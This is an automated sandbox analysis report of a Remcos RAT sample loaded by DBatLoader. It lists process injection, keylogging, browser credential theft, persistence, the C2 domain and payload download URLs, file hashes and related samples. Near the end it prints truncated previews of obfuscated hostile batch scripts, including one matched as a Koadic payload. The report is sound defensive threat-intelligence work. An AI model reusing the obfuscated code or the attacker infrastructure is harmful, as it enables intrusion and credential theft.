Behavior Graph (ID 1428364; sample XY2I8rWLkM.exe; start date 18/04/2024; architecture WINDOWS; score 100). Numbers in brackets after a process are the graph's created-registry-value / created-file counters as extracted.

Start node
  - Domains/IPs: jantis.duckdns.org (signature: Uses dynamic DNS services); web.fe.1drv.com; 6 other IPs or domains
  - Signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 14 other signatures
  - Starts: XY2I8rWLkM.exe; Ocihlomc.PIF; Ocihlomc.PIF (second instance)

XY2I8rWLkM.exe [1, 7]
  - Network: dual-spov-0006.spov-msedge.net 13.107.139.11, 443, 49704, 49705, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
  - Dropped: C:\Users\Public\Libraries\netutils.dll (PE32+); C:\Users\Public\Libraries\easinvoker.exe (PE32+); C:\Users\Public\Ocihlomc.url (MS); C:\Users\Public\Libraries\Ocihlomc (data)
  - Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection)
  - Starts: colorcpl.exe; extrac32.exe; cmd.exe

colorcpl.exe [5, 17] (started by XY2I8rWLkM.exe)
  - Network: jantis.duckdns.org 103.186.117.171, 1188, 49707, AARNET-AS-APAustralianAcademicandResearchNetworkAARNe, unknown; geoplugin.net 178.237.33.50, 49708, 80, ATOM86-ASATOM86NL, Netherlands
  - Dropped: \Device\ConDrv (ISO-8859); C:\ProgramData\ffrrdds\logs.dat (data)
  - Signatures: Contains functionality to bypass UAC (CMSTPLUA); Detected Remcos RAT; Contains functionality to change the wallpaper; Contains functionality to register a low level keyboard hook
  - Starts: conhost.exe

extrac32.exe [1] (started by XY2I8rWLkM.exe)
  - Dropped: C:\Users\Public\Libraries\Ocihlomc.PIF (PE32)
  - Signatures: Drops PE files with a suspicious file extension

cmd.exe [1] (started by XY2I8rWLkM.exe)
  - Starts: conhost.exe

Ocihlomc.PIF
  - Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Injects a PE file into a foreign process
  - Starts: SndVol.exe

SndVol.exe (started by Ocihlomc.PIF)
  - Signatures: Contains functionality to steal Chrome passwords or cookies; Contains functionality to steal Firefox passwords or cookies; Delayed program exit found

Ocihlomc.PIF (second instance)
  - Starts: colorcpl.exe

Submitted sample:
Source | Detection | Scanner | Label
XY2I8rWLkM.exe | 53% | ReversingLabs | Win32.Trojan.Remcos
XY2I8rWLkM.exe | 100% | Joe Sandbox ML |

Dropped files:
Source | Detection | Scanner | Label
C:\Users\Public\Libraries\netutils.dll | 100% | Avira | TR/AVI.Agent.rqsyc
C:\Users\Public\Libraries\Ocihlomc.PIF | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Ocihlomc.PIF | 53% | ReversingLabs | Win32.Trojan.Remcos
C:\Users\Public\Libraries\easinvoker.exe | 0% | ReversingLabs |
C:\Users\Public\Libraries\netutils.dll | 45% | ReversingLabs | Win64.Trojan.Generic

No Antivirus matches

No Antivirus matches

URLs:
Source | Detection | Scanner | Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | 0% | URL Reputation | safe
https://sectigo.com/CPS0 | 0% | URL Reputation | safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | 0% | URL Reputation | safe
http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | 0% | URL Reputation | safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0# | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 100% | URL Reputation | phishing
http://geoplugin.net/json.gp/C | 100% | URL Reputation | phishing
http://ocsp.sectigo.com0C | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dual-spov-0006.spov-msedge.net | 13.107.139.11 | true | false | | unknown
jantis.duckdns.org | 103.186.117.171 | true | true | | unknown
geoplugin.net | 178.237.33.50 | true | false | | unknown
onedrive.live.com | unknown | unknown | false | | high
gjc1pa.dm.files.1drv.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
jantis.duckdns.org | true | | unknown
http://geoplugin.net/json.gp | true | URL Reputation: phishing | unknown
https://onedrive.live.com/download?resid=38773C188FECDED2%21107&authkey=!APdTZ0yd8fEkIVs | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0 | XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://gjc1pa.dm.files.1drv.com/ | XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://gjc1pa.dm.files.1drv.com/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WShCc- | XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sectigo.com/CPS0 | XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0 | XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ocsp.sectigo.com0 | XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0# | XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp | false |
                                    • URL Reputation: safe
                                    unknown
                                    https://gjc1pa.dm.files.1drv.com/y4mpj9fRwfOnuyzM7YwI58jRvZ-dYfMjomP1KUnTARA567zRfUcLOtOoq9VQbjgVxqrXY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://geoplugin.net/#Ycolorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://geoplugin.net/json.gp~6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://geoplugin.net/colorcpl.exe, 00000005.00000003.2049864957.000000000046A000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.000000000045F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://geoplugin.net/json.gp/Ccolorcpl.exe, 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmptrue
                                            • URL Reputation: phishing
                                            unknown
                                            http://geoplugin.net/json.gpc6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://onedrive.live.com/JXY2I8rWLkM.exe, 00000000.00000002.2026131247.000000000078A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://gjc1pa.dm.files.1drv.com:443/y4m5jEZDAORJUhy5vxdvGivD8AK7KXuBMHd6mI9R-9NoISk9eoRi5CGeKvx95WSXY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://live.com/XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://geoplugin.net/json.gpJ6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      http://geoplugin.net/json.gpXcolorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://onedrive.live.com/download?resid=38773C188FECDED2%21107&authkey=XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013C40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://geoplugin.net/json.gpm6colorcpl.exe, 00000005.00000003.2049726907.0000000000451000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://www.pmail.comXY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.sectigo.com0CXY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012955583.000000007EC40000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.139.11 | dual-spov-0006.spov-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
103.186.117.171 | jantis.duckdns.org | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNet | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1428364
Start date and time: 2024-04-18 21:26:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 29s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XY2I8rWLkM.exe
renamed because original name is a hash value
Original Sample Name: 29af19382bdeadee6d93b98f354e703d.exe
Detection: MAL
Classification: mal100.rans.troj.spyw.expl.evad.winEXE@16/11@4/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 91
• Number of non-executed functions: 225
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.12
• Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odc-dm-files-geo.onedrive.akadns.net, odc-dm-files-brs.onedrive.akadns.net, l-0003.l-msedge.net, ocsp.digicert.com, odc-web-geo.onedrive.akadns.net, slscr.update.microsoft.com, dm-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: XY2I8rWLkM.exe
Time | Type | Description
21:26:50 | API Interceptor | 2x Sleep call for process: XY2I8rWLkM.exe modified
21:26:56 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ocihlomc C:\Users\Public\Ocihlomc.url
21:27:04 | API Interceptor | 2x Sleep call for process: Ocihlomc.PIF modified
21:27:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ocihlomc C:\Users\Public\Ocihlomc.url
21:27:28 | API Interceptor | 7701524x Sleep call for process: colorcpl.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: a0e9f5d64349fb13191bc781f81f42e1
• PO_983888123.xls | malicious | Unknown | 13.107.139.11
• 8Sb3Ng0nF3.exe | malicious | LummaC | 13.107.139.11
• SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exe | malicious | Unknown | 13.107.139.11
• Gantt_Excel_Pro_Daily_Free1.xlsm | malicious | Unknown | 13.107.139.11
• SecuriteInfo.com.Riskware.2144FlashPlayer.20362.15838.exe | malicious | Unknown | 13.107.139.11
• 5B8DEyPZmK.exe | malicious | LummaC | 13.107.139.11
• file.exe | malicious | RisePro Stealer | 13.107.139.11
• dendy.exe | malicious | RisePro Stealer | 13.107.139.11
• 5Dw2hTQmiB.exe | malicious | LummaC | 13.107.139.11
• Quotation 20241804.exe | malicious | Remcos, DBatLoader | 13.107.139.11
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: C:\Users\Public\Libraries\Ocihlomc.PIF
• 2020.xls | malicious | Remcos, DBatLoader
Match: C:\Users\Public\Libraries\easinvoker.exe
• 2020.xls | malicious | Remcos, DBatLoader
• Quotation 20241804.exe | malicious | Remcos, DBatLoader
• ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe | malicious | Remcos, DBatLoader
• RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• SecuriteInfo.com.FileRepMalware.21353.16266.exe | malicious | Remcos, DBatLoader
• disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• NEW ORDER 04154SHOP N0AWE12893.bat | malicious | Remcos, DBatLoader
• ONISZCZUK ASSOCIATES Purchase Order.bat | malicious | Remcos, DBatLoader
Match: C:\Users\Public\Libraries\netutils.dll
• 2020.xls | malicious | Remcos, DBatLoader
• Quotation 20241804.exe | malicious | Remcos, DBatLoader
• ORDER-CONFIRMATION-DETAILS-000235374564.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe | malicious | Remcos, DBatLoader
• RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• 20240416-703661.cmd | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• SecuriteInfo.com.FileRepMalware.21353.16266.exe | malicious | Remcos, DBatLoader
• disktop.pif.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer, RedLine
• NEW ORDER 04154SHOP N0AWE12893.bat | malicious | Remcos, DBatLoader
Process: C:\Windows\SysWOW64\colorcpl.exe
File Type: data
Category: modified
Size (bytes): 376
Entropy (8bit): 3.3887556315284373
Encrypted: false
SSDEEP: 6:6l+12U5YcIeeDAlIfE/OS/1gWAGfE/OSFWA7DxbN2fBMMm0v:6lDUecB/OSqWa/OSFWItN25MMl
MD5: 337644C91CCEBEB2BCE05418EF557FDF
SHA1: 02D0C7A54629455A672BD6A7786DD291625D5C09
SHA-256: FB837642524D383EEEFF71363009A1EE69A45C59C913DB4D80AC526E6F1A051C
SHA-512: 9878F78F2F9D4471DEC4352A64688F99E44A5CBE6C35C26783CF8218EB5FDDD21E2DDDA67CD4154315B93A5450170F2FD52D2D7BAC015B8EA22401EDAB670C7E
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\ffrrdds\logs.dat, Author: Joe Security
Reputation: low
Preview (UTF-16LE, decoded): [2024/04/18 21:26:54 Offline Keylogger Started] [Colour Management] [Run] [Program Manager] [Colour Management] [Program Manager] { User has been idle for 0 minutes }

Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 3
Entropy (8bit): 1.584962500721156
Encrypted: false
SSDEEP: 3:m:m
MD5: 66B86AB0232F8377C518F27EF9AE4BE8
SHA1: 08E5BA8AB2C17ED0EB5CDD45C51F7391EA6190FF
SHA-256: 92961E9752250EFA971147344B22295DB32D7B75E940E0971E5FB34F21D0BC67
SHA-512: F470202BB57BFB03C37AC0A8EE67F8094AF85DF9BF10C1BF5706A035262050AF7418D8F68EED7EE00C249A3C49B4DD247EDED5B49A7CEBEAB756697FC8CE0545
Malicious: false
Reputation: moderate, very likely benign file
Preview: 6..

Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: data
Category: dropped
Size (bytes): 803972
Entropy (8bit): 7.399378314009563
Encrypted: false
SSDEEP: 12288:SWIv08K3Mbq4LpF6Ow5qWE7KrGe9oJXdhTIIvZAAc1LaEhMfHU0MlXk5:SP/K3j4LndAqWE7WNqRkYAdWEIHxMlXS
MD5: E8830F86B5FE9223E52332D463FB5492
SHA1: 669BFD99B16FE93E9B4D73BDD332FB75074561DE
SHA-256: 6669FC91687DEBFEBC0887CA97257722412C715366DA56CB78A80D67901BA4D2
SHA-512: 2657886F87D34339D8188ED80C212A7E79AE7A70310F8511C6C6B143C7F695E9F4FBCF34632E43AC332B51CF096035E3D09342F8BBE491FEA1F3A2A29BE7831D
Malicious: true
Process: C:\Windows\SysWOW64\extrac32.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 2200064
Entropy (8bit): 7.353300273739676
Encrypted: false
SSDEEP: 49152:3ARQYxxZrm0UZu0LCi2wcc/Z9L7KtQDSxxZrmh7:3Uxu0UQ0LCccaZ9LU7xuh
MD5: 29AF19382BDEADEE6D93B98F354E703D
SHA1: 3D38885812AA0C910025D86E05287600C745F5C8
SHA-256: 8A005601E52341E8AFF3C95CF30F4EDE6B874D2B7E6FFDB9AFDA9425733FC5D7
SHA-512: AC5DF65ACDB4B3FBE288983EB7498761C64E7E3DD4161D1F74A6B749468C7B5B5209474E91E199625933F439785A730D181C30D2379F791EA5F424FC407649EF
Malicious: true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 53%
Joe Sandbox View:
• Filename: 2020.xls, Detection: malicious
Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: Unicode text, UTF-16, little-endian text, with very long lines (15012), with no line terminators
Category: dropped
Size (bytes): 30026
Entropy (8bit): 3.9380000056299878
Encrypted: false
SSDEEP: 192:IBOY7cKQ/CyntVZjpubO0bXWQtagxP2+3o5WIGbfJTAy:C
MD5: 828FFBF60677999579DAFE4BF3919C63
SHA1: A0D159A1B9A49E9EACCC53FE0C3266C0526A1BDC
SHA-256: ABAC4A967800F5DA708572EC42441EC373CD52459A83A8A382D6B8579482789D
SHA-512: BF00909E24C5A6FB2346E8457A9ADACD5F1B35988D90ABBDE9FF26896BBB59EDAFEA60D9DB4D10182A7B5E129BB69585D3E20BC5C63AF3517B3A7EF1E45FFB7E
Malicious: false
Yara Hits:
• Rule: MALWARE_BAT_KoadicBAT, Description: Koadic post-exploitation framework BAT payload, Source: C:\Users\Public\Libraries\OcihlomcO.bat, Author: ditekSHen
                                                                                                                            Preview:..&@cls&@set "_...=H zAnOeUIivpoS3l71mXMxw8yaqYTEuKgFGPJZRfr@k6Wj9sbQB4VtLD2d0C5Nch"..%_...:~41,1%%_...:~47,1%%_...:~6,1%%_...:~53,1%%_...:~1,1%"_...=%_...:~10,1%%_...:~39,1%%_...:~16,1%%_...:~13,1%%_...:~25,1%%_...:~53,1%%_...:~42,1%%_...:~22,1%%_...:~18,1%%_...:~48,1%%_...:~51,1%%_...:~2,1%%_...:~61,1%%_...:~9,1%%_...:~19,1%%_...:~44,1%%_...:~50,1%%_...:~57,1%%_...:~26,1%%_...:~4,1%%_...:~62,1%%_...:~3,1%%_...:~33,1%%_...:~38,1%%_...:~40,1%%.......%%_...:~60,1%%_...:~0,1%%_...:~43,1%%_...:~34,1%%_...:~58,1%%_...:~15,1%%_...:~7,1%%_...:~20,1%%_...:~49,1%%_...:~35,1%%_...:~14,1%%_...:~30,1%%_...:~36,1%%_...:~41,1%%_...:~45,1%%_...:~11,1%%_...:~55,1%%_...:~32,1%%_...:~17,1%%_...:~63,1%%_...:~56,1%%_...:~21,1%%_...:~37,1%%_...:~8,1%%_...:~54,1%%_...:~28,1%%_...:~6,1%%.......%%_...:~5,1%%_...:~59,1%%_...:~52,1%%_...:~29,1%%_...:~24,1%%_...:~12,1%%_...:~46,1%%_...:~47,1%%_...:~1,1%%_...:~23,1%%_...:~27,1%%_...:~31,1%"..%_...:~38,1%%_...:~59,1%%_...:~51,1%%_...:~5,1%%_...:~60,1%"_....=%_...
Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: DOS batch file, ASCII text, with very long lines (468), with CRLF line terminators
Category: dropped
Size (bytes): 3646
Entropy (8bit): 5.383959173452972
Encrypted: false
SSDEEP: 96:Zx2A0d5a9zHPwo0uP6SXjr4XtgPmon38JV7ZVhvoXS966hYxcdF4AlM5NQYE2Pl+:3L6jThc/pkmZAXpA2
MD5: 71E46EFE9932B83B397B44052513FB49
SHA1: 741AF3B8C31095A0CC2C39C41E62279684913205
SHA-256: 11C20FABF677CD77E8A354B520F6FFCA09CAC37CE15C9932550E749E49EFE08A
SHA-512: 76DA3B441C0EAAAABDD4D21B0A3D4AA7FD49D73A5F0DAB2CFB39F2E114EFE4F4DABE2D46B01B66D810D6E0EFA97676599ECE5C213C1A69A5F2F4897A9B4AC8DA
Malicious: false
                                                                                                                            Preview:@echo off..set "Nnqr=set "..%Nnqr%"njyC=="..%Nnqr%"qkMvMLsfma%njyC%http"..%Nnqr%"dbvWEsxWns%njyC%rem "..%Nnqr%"NpzRZtRBVV%njyC%Cloa"..%Nnqr%"ftNVZzSZxa%njyC%/Bat"..%Nnqr%"TwupSEtIWD%njyC%gith"..%Nnqr%"yIGacXULig%njyC%k"..%Nnqr%"uGlGnqCSun%njyC%h2sh"..%Nnqr%"FUsYUbfxRq%njyC%s://"..%Nnqr%"ewghYLVJDJ%njyC%om/c"..%Nnqr%"ZxOeNaoDFO%njyC%ub.c"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%%TwupSEtIWD%%ZxOeNaoDFO%%ewghYLVJDJ%%uGlGnqCSun%%ftNVZzSZxa%%NpzRZtRBVV%%yIGacXULig%..%Nnqr%"dbvWEsxWns%njyC%@ech"..%Nnqr%"qkMvMLsfma%njyC%o of"..%Nnqr%"FUsYUbfxRq%njyC%f"..%dbvWEsxWns%%qkMvMLsfma%%FUsYUbfxRq%..%Nnqr%"NOtbuvMLuE%njyC%alph"..%Nnqr%"jSzGRzcKvC%njyC%ul 2"..%Nnqr%"KhBjpctAkV%njyC%.exe"..%Nnqr%"ftNVZzSZxa%njyC%c32."..%Nnqr%"czhHhGJsdj%njyC%m32\"..%Nnqr%"TOzhrohQZT%njyC% C:\"..%Nnqr%"NpzRZtRBVV%njyC%exe "..%Nnqr%"ppIMorhdlj%njyC% &"..%Nnqr%"SXdBSshqoL%njyC%Publ"..%Nnqr%"apGEijJnKT%njyC%\cmd"..%Nnqr%"qkMvMLsfma%njyC%Wind"..%Nnqr%"QxcSEoHMVZ%njyC%s\\S"..%Nnqr%"AvhQIkjRki%njyC%a.ex"..%Nnqr%"yIGacXULig%njyC%/
Process: C:\Users\user\Desktop\XY2I8rWLkM.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 131648
Entropy (8bit): 5.225468064273746
Encrypted: false
SSDEEP: 3072:zar2xXibKcf5K67+k02XbFbosspwUUgcR:Nibl7+k02XZb9UA
MD5: 231CE1E1D7D98B44371FFFF407D68B59
SHA1: 25510D0F6353DBF0C9F72FC880DE7585E34B28FF
SHA-256: 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
SHA-512: 520887B01BDA96B7C4F91B9330A5C03A12F7C7F266D4359432E7BACC76B0EEF377C05A4361F8FA80AD0B94B5865699D747A5D94A2D3DCDB85DABF5887BB6C612
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: 2020.xls, Detection: malicious
• Filename: Quotation 20241804.exe, Detection: malicious
• Filename: ORDER-CONFIRMATION-DETAILS-000235374564.cmd, Detection: malicious
• Filename: SecuriteInfo.com.Win32.RATX-gen.12024.12837.exe, Detection: malicious
• Filename: RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZ, Detection: malicious
• Filename: 20240416-703661.cmd, Detection: malicious
• Filename: SecuriteInfo.com.FileRepMalware.21353.16266.exe, Detection: malicious
• Filename: disktop.pif.exe, Detection: malicious
• Filename: NEW ORDER 04154SHOP N0AWE12893.bat, Detection: malicious
• Filename: ONISZCZUK ASSOCIATES Purchase Order.bat, Detection: malicious
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........GF..)...)...).,.....).,.....).,.....)...(.V.).,.....).,.....).,.....).,.....).Rich..).........................PE..d...^PPT.........."..........D...... ..........@............................. ......z................ ..................................................................@&......4....................................................................................text............................... ..`.imrsiv..................................data...............................@....pdata..............................@..@.idata..............................@..@.rsrc...............................@..@.reloc..4...........................@..B........................................................................................................................................................................................................................
